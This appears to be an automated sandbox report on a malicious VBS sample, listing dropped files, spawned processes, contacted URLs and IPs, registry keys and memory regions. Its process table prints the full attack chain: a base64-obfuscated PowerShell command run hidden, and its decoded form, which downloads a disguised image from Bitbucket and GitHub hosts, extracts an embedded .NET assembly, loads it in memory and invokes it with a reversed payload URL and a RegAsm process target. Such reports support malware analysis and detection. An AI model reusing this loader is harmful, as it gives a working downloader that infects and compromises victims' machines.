Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
8FebOORbmE.vbs
|
ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gew0kjui.nic.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnvodi2f.1jz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uoj4c5k4.dkz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xesokk3z.rdr.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3nhxwap.3md.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yrtrla3n.vkl.psm1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\8FebOORbmE.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#GE#Z#Bz#HM#ZwBm#GQ#cwBn#C8#d#Bl#HM#d#Bp#G4#Zw#v#GQ#bwB3#G4#b#Bv#GE#Z#Bz#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#n#Cw#I##n#Gg#d#B0#H##cw#6#C8#LwBy#GE#dw#u#Gc#aQB0#Gg#dQBi#HU#cwBl#HI#YwBv#G4#d#Bl#G4#d##u#GM#bwBt#C8#cwBh#G4#d#Bv#G0#YQBs#G8#LwBh#HU#Z#Bp#HQ#LwBt#GE#aQBu#C8#aQBt#Gc#XwB0#GU#cwB0#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#y#DM#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##PQ#g#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#EY#cgBv#G0#T#Bp#G4#awBz#C##J#Bs#Gk#bgBr#HM#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#g#C0#bgBl#C##J#Bu#HU#b#Bs#Ck#I#B7#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#KQ#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBT#FQ#QQBS#FQ#Pg#+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE#D4#Pg#n#Ds#I##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##9#C##J#Bp#G0#YQBn#GU#V#Bl#Hg#d##u#Ek#bgBk#GU#e#BP#GY#K##k#HM#d#Bh#HI#d#BG#Gw#YQBn#Ck#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#GU#bgBk#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQBu#GQ#RgBs#GE#Zw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##aQBm#C##K##k#HM#d#Bh#HI#d#BJ#G4#Z#Bl#Hg#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#Gc#d##g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##p#C##ew#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#Cs#PQ#g#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#LgBM#GU#bgBn#HQ#a##7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#YgBh#HM#ZQ#2#DQ#T#Bl#G4#ZwB0#Gg#I##9#C##J#Bl#G4#Z#BJ#G4#Z#Bl#Hg#I##t#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBT#HU#YgBz#HQ#cgBp#G4#Zw#o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##s#C##J#Bi#GE#cwBl#DY#N#BM#GU#bgBn#HQ#a##p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bj#G8#bQBt#GE#bgBk#EI#eQB0#GU#cw#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#QwBv#G4#dgBl#HI#d#Bd#Do#OgBG#HI#bwBt#EI#YQBz#GU#Ng#0#FM#d#By#Gk#bgBn#Cg#J#Bi#GE#cwBl#DY#N#BD#G8#bQBt#GE#bgBk#Ck#Ow#g#CQ#b#Bv#GE#Z#Bl#GQ#QQBz#HM#ZQBt#GI#b#B5#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBS#GU#ZgBs#GU#YwB0#Gk#bwBu#C4#QQBz#HM#ZQBt#GI#b#B5#F0#Og#6#Ew#bwBh#GQ#K##k#GM#bwBt#G0#YQBu#GQ#QgB5#HQ#ZQBz#Ck#Ow#g#CQ#d#B5#H##ZQ#g#D0#I##k#Gw#bwBh#GQ#ZQBk#EE#cwBz#GU#bQBi#Gw#eQ#u#Ec#ZQB0#FQ#eQBw#GU#K##n#HQ#ZQBz#HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#bQBl#HQ#a#Bv#GQ#I##9#C##J#B0#Hk#c#Bl#C4#RwBl#HQ#TQBl#HQ#a#Bv#GQ#K##n#Gw#YQ#n#Ck#LgBJ#G4#dgBv#Gs#ZQ#o#CQ#bgB1#Gw#b##s#C##WwBv#GI#agBl#GM#d#Bb#F0#XQ#g#Cg#Jw#g#HQ#e#B0#C4#YQBk#Gg#UwBG#Gc#QQ#v#HM#Z#Bh#G8#b#Bu#Hc#bwBk#C8#dwBx#HQ#cgBl#HQ#cgBl#C8#awBy#HU#cgBl#G0#b#B1#HI#LwBn#HI#bw#u#HQ#ZQBr#GM#dQBi#HQ#aQBi#C8#Lw#6#HM#c#B0#HQ#a##n#Cw#I##n#D##Jw#s#C##JwBT#HQ#YQBy#HQ#dQBw#E4#YQBt#GU#Jw#s#C##JwBS#GU#ZwBB#HM#bQ#n#Cw#I##n#D##Jw#p#Ck#fQB9##==';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('#','A') ));powershell.exe
$OWjuxD .exe -windowstyle hidden -exec
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient;
$shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try
{ return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417',
'https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);
$startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag);
$endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex
+= $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex,
$base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);
$type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]]
(' txt.adhSFgA/sdaolnwod/wqtretre/kruremlur/gro.tekcubtib//:sptth', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle
hidden -exec
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://raw.githubusercontent.com
|
unknown
|
|
|
|
https://bitbucket.org/adssgfdsg/testing/downl
|
unknown
|
|
|
|
https://bitbucket.org/adssgfdsg/testing/downloads/img_test.jpg?144417
|
185.166.143.50
|
|
|
|
https://raw.githubusercontent.com/santomalo/audit/main/img_test.jpg?14441723
|
185.199.108.133
|
|
|
|
https://bitbucket.org
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
https://ion=v4.5mConsumerS
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://web-security-reports.services.atlassian.com/csp-report/bb-website
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
http://crl.mic
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://go.micros
|
unknown
|
||
|
https://dz8aopenkvv6s.cloudfront.net
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://cdn.cookielaw.org/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://aui-cdn.atlassian.com/
|
unknown
|
||
|
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/;
|
unknown
|
||
|
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
|
unknown
|
||
|
http://crl.micft.cMicRosof
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://bbuseruploads.s3.amazonaws.com/cbff8810-ace3-4466-81b1-12ba7827c90a/downloads/6b181c48-ea9d-
|
unknown
|
There are 25 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
bitbucket.org
|
185.166.143.50
|
|
|
|
raw.githubusercontent.com
|
185.199.108.133
|
|
|
|
s-part-0015.t-0009.t-msedge.net
|
13.107.246.43
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
185.199.108.133
|
raw.githubusercontent.com
|
Netherlands
|
|
|
|
185.166.143.50
|
bitbucket.org
|
Germany
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 4 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7DF4D0FD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
12C38556000
|
trusted library allocation
|
page read and write
|
||
|
24F4D1E2000
|
heap
|
page read and write
|
||
|
18D95B26000
|
heap
|
page read and write
|
||
|
B76D5FE000
|
stack
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
1B58E4E000
|
stack
|
page read and write
|
||
|
12C50BA0000
|
heap
|
page read and write
|
||
|
12C5079F000
|
heap
|
page read and write
|
||
|
18D93E86000
|
heap
|
page read and write
|
||
|
12C36491000
|
heap
|
page read and write
|
||
|
18D93E20000
|
heap
|
page read and write
|
||
|
18D93C80000
|
heap
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
24F4D01C000
|
heap
|
page read and write
|
||
|
18D93E9A000
|
heap
|
page read and write
|
||
|
7FF886B20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B14000
|
trusted library allocation
|
page read and write
|
||
|
24F33115000
|
heap
|
page read and write
|
||
|
18D95B16000
|
heap
|
page read and write
|
||
|
18D93DA0000
|
heap
|
page read and write
|
||
|
1B58FCE000
|
stack
|
page read and write
|
||
|
5C369FE000
|
stack
|
page read and write
|
||
|
12C36670000
|
heap
|
page execute and read and write
|
||
|
B76D4F9000
|
stack
|
page read and write
|
||
|
7FF886BF6000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D93E66000
|
heap
|
page read and write
|
||
|
12C5084E000
|
heap
|
page read and write
|
||
|
24F34F18000
|
trusted library allocation
|
page read and write
|
||
|
18D93DA8000
|
heap
|
page read and write
|
||
|
24F34F3F000
|
trusted library allocation
|
page read and write
|
||
|
24F34C36000
|
trusted library allocation
|
page read and write
|
||
|
12C366F0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886ED0000
|
trusted library allocation
|
page read and write
|
||
|
18D93E97000
|
heap
|
page read and write
|
||
|
B76D67E000
|
stack
|
page read and write
|
||
|
24F330B0000
|
trusted library allocation
|
page read and write
|
||
|
12C3855E000
|
trusted library allocation
|
page read and write
|
||
|
18D95B26000
|
heap
|
page read and write
|
||
|
7DF4D0FE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886FE2000
|
trusted library allocation
|
page read and write
|
||
|
12C507F4000
|
heap
|
page read and write
|
||
|
24F4CFDA000
|
heap
|
page read and write
|
||
|
7FF886B13000
|
trusted library allocation
|
page execute and read and write
|
||
|
12C36400000
|
heap
|
page read and write
|
||
|
18D93EAE000
|
heap
|
page read and write
|
||
|
7FF886E00000
|
trusted library allocation
|
page read and write
|
||
|
5C371FB000
|
stack
|
page read and write
|
||
|
24F34C33000
|
trusted library allocation
|
page read and write
|
||
|
12C36450000
|
heap
|
page read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
24F4D0A0000
|
heap
|
page read and write
|
||
|
24F4D090000
|
heap
|
page execute and read and write
|
||
|
18D95B1E000
|
heap
|
page read and write
|
||
|
18D93EC3000
|
heap
|
page read and write
|
||
|
7FF886E70000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
5C36CFF000
|
stack
|
page read and write
|
||
|
24F34F2C000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CF2000
|
trusted library allocation
|
page read and write
|
||
|
12C39CFF000
|
trusted library allocation
|
page read and write
|
||
|
12C3854C000
|
trusted library allocation
|
page read and write
|
||
|
18D93EF5000
|
heap
|
page read and write
|
||
|
1B582FE000
|
stack
|
page read and write
|
||
|
7FF886B22000
|
trusted library allocation
|
page read and write
|
||
|
1B580F7000
|
stack
|
page read and write
|
||
|
12C39AEB000
|
trusted library allocation
|
page read and write
|
||
|
12C38150000
|
heap
|
page execute and read and write
|
||
|
12C50585000
|
heap
|
page read and write
|
||
|
24F32EF0000
|
heap
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
24F4CFF2000
|
heap
|
page read and write
|
||
|
12C3649A000
|
heap
|
page read and write
|
||
|
18D93DAC000
|
heap
|
page read and write
|
||
|
12C504BC000
|
heap
|
page read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E80000
|
trusted library allocation
|
page read and write
|
||
|
7FF886CE0000
|
trusted library allocation
|
page execute and read and write
|
||
|
12C39CE1000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F63000
|
trusted library allocation
|
page read and write
|
||
|
24F32F10000
|
heap
|
page read and write
|
||
|
24F34B2D000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
12C3A0FF000
|
trusted library allocation
|
page read and write
|
||
|
12C381E6000
|
trusted library allocation
|
page read and write
|
||
|
1B58ECD000
|
stack
|
page read and write
|
||
|
12C506CB000
|
heap
|
page read and write
|
||
|
12C37FE0000
|
heap
|
page execute and read and write
|
||
|
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
|
12C3858F000
|
trusted library allocation
|
page read and write
|
||
|
12C481D3000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BC0000
|
trusted library allocation
|
page read and write
|
||
|
24F3505E000
|
trusted library allocation
|
page read and write
|
||
|
18D93DAE000
|
heap
|
page read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
24F32FB5000
|
heap
|
page read and write
|
||
|
B76D2FE000
|
stack
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
18D93EC3000
|
heap
|
page read and write
|
||
|
18D93EAC000
|
heap
|
page read and write
|
||
|
12C50761000
|
heap
|
page read and write
|
||
|
7FF886CD1000
|
trusted library allocation
|
page read and write
|
||
|
12C363C0000
|
heap
|
page read and write
|
||
|
24F4D1B4000
|
heap
|
page read and write
|
||
|
12C366C0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EC4000
|
trusted library allocation
|
page read and write
|
||
|
18D93EC3000
|
heap
|
page read and write
|
||
|
18D93E79000
|
heap
|
page read and write
|
||
|
12C36770000
|
heap
|
page read and write
|
||
|
12C36676000
|
heap
|
page execute and read and write
|
||
|
24F34C30000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EC0000
|
trusted library allocation
|
page read and write
|
||
|
24F3302E000
|
heap
|
page read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
24F33003000
|
heap
|
page read and write
|
||
|
24F33110000
|
heap
|
page read and write
|
||
|
18D93E49000
|
heap
|
page read and write
|
||
|
12C39167000
|
trusted library allocation
|
page read and write
|
||
|
5C368FE000
|
stack
|
page read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
24F330C0000
|
heap
|
page readonly
|
||
|
12C504F4000
|
heap
|
page read and write
|
||
|
B76D17E000
|
stack
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
18D95B11000
|
heap
|
page read and write
|
||
|
18D95B11000
|
heap
|
page read and write
|
||
|
B76D1FC000
|
stack
|
page read and write
|
||
|
7FF886D00000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886FF0000
|
trusted library allocation
|
page read and write
|
||
|
24F351B3000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
5C36BFF000
|
stack
|
page read and write
|
||
|
7FF886CD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F350A3000
|
trusted library allocation
|
page read and write
|
||
|
24F4D0C0000
|
heap
|
page read and write
|
||
|
7FF886FA0000
|
trusted library allocation
|
page read and write
|
||
|
1B5837E000
|
stack
|
page read and write
|
||
|
12C50829000
|
heap
|
page read and write
|
||
|
24F34A00000
|
heap
|
page execute and read and write
|
||
|
7FF886F80000
|
trusted library allocation
|
page read and write
|
||
|
24F4D048000
|
heap
|
page read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
18D93EF8000
|
heap
|
page read and write
|
||
|
7FF886CC4000
|
trusted library allocation
|
page read and write
|
||
|
7FF886C06000
|
trusted library allocation
|
page execute and read and write
|
||
|
18D93E9E000
|
heap
|
page read and write
|
||
|
12C5055F000
|
heap
|
page read and write
|
||
|
18D93EC3000
|
heap
|
page read and write
|
||
|
12C4836E000
|
trusted library allocation
|
page read and write
|
||
|
18D93EB4000
|
heap
|
page read and write
|
||
|
12C50791000
|
heap
|
page read and write
|
||
|
12C507AD000
|
heap
|
page read and write
|
||
|
18D93E8B000
|
heap
|
page read and write
|
||
|
12C38029000
|
heap
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
12C36440000
|
trusted library allocation
|
page read and write
|
||
|
12C506A0000
|
heap
|
page read and write
|
||
|
24F4D1B0000
|
heap
|
page read and write
|
||
|
5C36FFE000
|
stack
|
page read and write
|
||
|
12C389F2000
|
trusted library allocation
|
page read and write
|
||
|
12C395BC000
|
trusted library allocation
|
page read and write
|
||
|
7FF886F70000
|
trusted library allocation
|
page read and write
|
||
|
12C364A2000
|
heap
|
page read and write
|
||
|
12C50788000
|
heap
|
page read and write
|
||
|
18D95B35000
|
heap
|
page read and write
|
||
|
18D93DA5000
|
heap
|
page read and write
|
||
|
1B57D7E000
|
stack
|
page read and write
|
||
|
12C3A0D9000
|
trusted library allocation
|
page read and write
|
||
|
12C50823000
|
heap
|
page read and write
|
||
|
24F44B11000
|
trusted library allocation
|
page read and write
|
||
|
12C39700000
|
trusted library allocation
|
page read and write
|
||
|
B76D0FF000
|
stack
|
page read and write
|
||
|
12C390BB000
|
trusted library allocation
|
page read and write
|
||
|
18D93D80000
|
heap
|
page read and write
|
||
|
7FF886EA3000
|
trusted library allocation
|
page read and write
|
||
|
1B58F4C000
|
stack
|
page read and write
|
||
|
24F34C7F000
|
trusted library allocation
|
page read and write
|
||
|
12C48460000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B1D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F4D1F1000
|
heap
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
24F34C3C000
|
trusted library allocation
|
page read and write
|
||
|
24F34C44000
|
trusted library allocation
|
page read and write
|
||
|
24F34C4A000
|
trusted library allocation
|
page read and write
|
||
|
18D93DA8000
|
heap
|
page read and write
|
||
|
12C50A30000
|
heap
|
page read and write
|
||
|
18D93EF2000
|
heap
|
page read and write
|
||
|
24F3502F000
|
trusted library allocation
|
page read and write
|
||
|
1B583FE000
|
stack
|
page read and write
|
||
|
24F34F06000
|
trusted library allocation
|
page read and write
|
||
|
12C364DB000
|
heap
|
page read and write
|
||
|
12C50757000
|
heap
|
page read and write
|
||
|
B76D07E000
|
stack
|
page read and write
|
||
|
18D95B26000
|
heap
|
page read and write
|
||
|
18D93E71000
|
heap
|
page read and write
|
||
|
18D93E66000
|
heap
|
page read and write
|
||
|
12C50519000
|
heap
|
page read and write
|
||
|
24F4D097000
|
heap
|
page execute and read and write
|
||
|
24F32F50000
|
heap
|
page read and write
|
||
|
12C366B6000
|
heap
|
page read and write
|
||
|
1B579DE000
|
stack
|
page read and write
|
||
|
12C39D0E000
|
trusted library allocation
|
page read and write
|
||
|
18D95B26000
|
heap
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
12C366B0000
|
heap
|
page read and write
|
||
|
7FF886C30000
|
trusted library allocation
|
page execute and read and write
|
||
|
24F3308D000
|
heap
|
page read and write
|
||
|
18D95B35000
|
heap
|
page read and write
|
||
|
12C48189000
|
trusted library allocation
|
page read and write
|
||
|
18D93EF0000
|
heap
|
page read and write
|
||
|
18D93E90000
|
heap
|
page read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
B76D77E000
|
stack
|
page read and write
|
||
|
1B57FFE000
|
stack
|
page read and write
|
||
|
1B5827E000
|
stack
|
page read and write
|
||
|
24F32FEB000
|
heap
|
page read and write
|
||
|
12C385CC000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D10000
|
trusted library allocation
|
page read and write
|
||
|
24F32FF1000
|
heap
|
page read and write
|
||
|
7FF886ED8000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BD6000
|
trusted library allocation
|
page read and write
|
||
|
7FF886EC9000
|
trusted library allocation
|
page read and write
|
||
|
24F34B65000
|
trusted library allocation
|
page read and write
|
||
|
12C509F0000
|
trusted library allocation
|
page read and write
|
||
|
12C5057D000
|
heap
|
page read and write
|
||
|
18D93E49000
|
heap
|
page read and write
|
||
|
7FF886B7C000
|
trusted library allocation
|
page execute and read and write
|
||
